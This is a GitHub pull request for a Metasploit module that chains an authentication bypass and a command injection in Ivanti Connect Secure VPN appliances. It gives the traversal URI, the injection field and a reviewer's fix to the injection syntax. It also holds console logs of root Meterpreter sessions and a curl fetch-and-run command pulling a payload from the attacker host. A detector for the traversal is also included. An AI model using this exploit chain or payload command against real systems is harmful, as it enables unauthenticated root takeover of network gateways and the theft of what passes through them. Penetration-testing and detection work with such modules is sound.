Ivanti Connect Secure RCE exploit module (CVE-2023-46805 and CVE-2024-21887) #18708

Merged (12 commits), Jan 19, 2024

Conversation

@sfewer-r7 sfewer-r7 commented Jan 16, 2024

This is a draft pull request for the recent 0day exploit chain against Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887).

For technical details on the vulnerabilities used in this exploit, read our AttackerKB Analysis:

To-Do:

  • More testing
  • Documentation

Example Usage

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Sending stage (3045380 bytes) to 192.168.86.111
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.111:15258) at 2024-01-16 14:37:07 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.111
OS           :  (Linux 4.15.18.34-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > cat /home/ssl-vpn-VERSION
export DSREL_MAJOR=22
export DSREL_MINOR=3
export DSREL_MAINT=1
export DSREL_DATAVER=4802
export DSREL_PRODUCT=ssl-vpn
export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
meterpreter > 

@sfewer-r7 sfewer-r7 marked this pull request as ready for review January 17, 2024 10:26
'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',
'ctype' => 'application/json',
'data' => {
'type' => ";#{cmd};",
Contributor

Suggested change
'type' => ";#{cmd};",
'type' => ";#{cmd}#",

Since this is a command injection, using a comment (#) will prevent the trailing part of the original command from being executed, and ultimately from showing up in the log as it fails.

@sfewer-r7 sfewer-r7 Jan 18, 2024

Turns out for this to work as expected you also must add in a space character before the comment. This is what was preventing the Linux payloads from working. The change in 4ff3998 also removes the need to bootstrap the Linux payloads. Every day's a school day, thanks @jvoisin 😄
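As an added example, not code from the PR or the Metasploit module: a Ruby detector that resolves the traversal in the request URI discussed above and flags access-log lines whose request nominally falls under the unauthenticated TOTP prefix but, once the "../" segments are resolved, lands on the maintenance endpoint the command injection targets. The log format (common log format) and the sample lines are constructed.

```ruby
# Both paths come from the request URI in the module under review.
TOTP_PREFIX      = '/api/v1/totp/user-backup-code'
INJECTION_TARGET = '/api/v1/system/maintenance/archiving/cloud-server-test-connection'

# Drop the query string and percent-decode, so "..%2f" is seen as "../".
def decode_path(raw)
  raw.split('?', 2).first.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Resolve "." and ".." segments the way a server-side router would.
def normalize_path(path)
  out = []
  path.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    seg == '..' ? out.pop : out << seg
  end
  '/' + out.join('/')
end

def under?(path, prefix)
  path == prefix || path.start_with?(prefix + '/')
end

# Return a finding for a suspicious line, or nil (assumes a common-log-format request line).
def inspect_log_line(line)
  m = line.match(%r{"(?<method>[A-Z]+) (?<uri>\S+) HTTP/[\d.]+"})
  return nil unless m
  decoded  = decode_path(m[:uri])
  resolved = normalize_path(decoded)
  # Suspicious only when the literal path claims the TOTP prefix (which the
  # auth check trusts) but the resolved path escapes it.
  return nil unless under?(decoded, TOTP_PREFIX) && !under?(resolved, TOTP_PREFIX)
  { method: m[:method], raw: m[:uri], resolved: resolved,
    hits_injection_endpoint: resolved == INJECTION_TARGET }
end

def scan(lines)
  lines.map { |l| inspect_log_line(l) }.compact
end

# Constructed sample log: plain traversal, encoded traversal, two benign requests.
SAMPLE_LOG = [
  '10.0.0.5 - - [16/Jan/2024:14:37:01 +0000] "POST /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection HTTP/1.1" 200 512',
  '10.0.0.7 - - [16/Jan/2024:14:38:10 +0000] "POST /api/v1/totp/user-backup-code/ HTTP/1.1" 200 128',
  '10.0.0.9 - - [16/Jan/2024:14:39:22 +0000] "GET /api/v1/totp/user-backup-code/..%2f..%2fsystem/maintenance/archiving/cloud-server-test-connection HTTP/1.1" 403 0',
  '10.0.0.9 - - [16/Jan/2024:14:40:00 +0000] "GET /index.html HTTP/1.1" 200 4096'
]

scan(SAMPLE_LOG).each { |f| puts "#{f[:method]} #{f[:raw]} -> #{f[:resolved]}" }
```

Note that the third sample line received a 403 yet is still flagged: the traversal attempt is the signal, not whether it succeeded.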

sfewer-r7 and others added 4 commits January 18, 2024 09:18
…_rce_cve_2023_46805.md

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…_46805.rb

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…_46805.rb

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
… portion of the command string (Thank you @jvoisin). We must also include a space character for this to work as expected, doing so also removes the need to bootstrap the Linux payloads with a separate file.
# is only for display purposes, we don't need to test the version information.

begin
json_data = JSON.parse(res.body)
Contributor

get_json_document may be a better option

Contributor Author

I implemented this suggestion via de6ed9e

@bwatters-r7 bwatters-r7 self-assigned this Jan 19, 2024
@bwatters-r7

Linux Command
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options

Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      qwsUhgQYPx       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set rhost 10.5.132.223
rhost => 10.5.132.223
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > run

[*] Command to run on remote host: curl -so /tmp/NuZBXSXwEe http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/NuZBXSXwEe; /tmp/NuZBXSXwEe &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Client 10.5.132.223 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.132.223 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.132.223
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.223:51540) at 2024-01-19 15:24:31 -0600

meterpreter > sysinfo
Computer     : 10.5.132.223
OS           :  (Linux 4.15.18.34-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 


Unix Command
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options

Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.223     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Sending stage (24768 bytes) to 10.5.132.223
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.223:51542) at 2024-01-19 15:28:52 -0600

meterpreter > sysinfo
Computer     : localhost2
OS           : Linux 4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit fadb0f4 into rapid7:master Jan 19, 2024
34 checks passed
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 19, 2024
@bwatters-r7

Release Notes

This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.
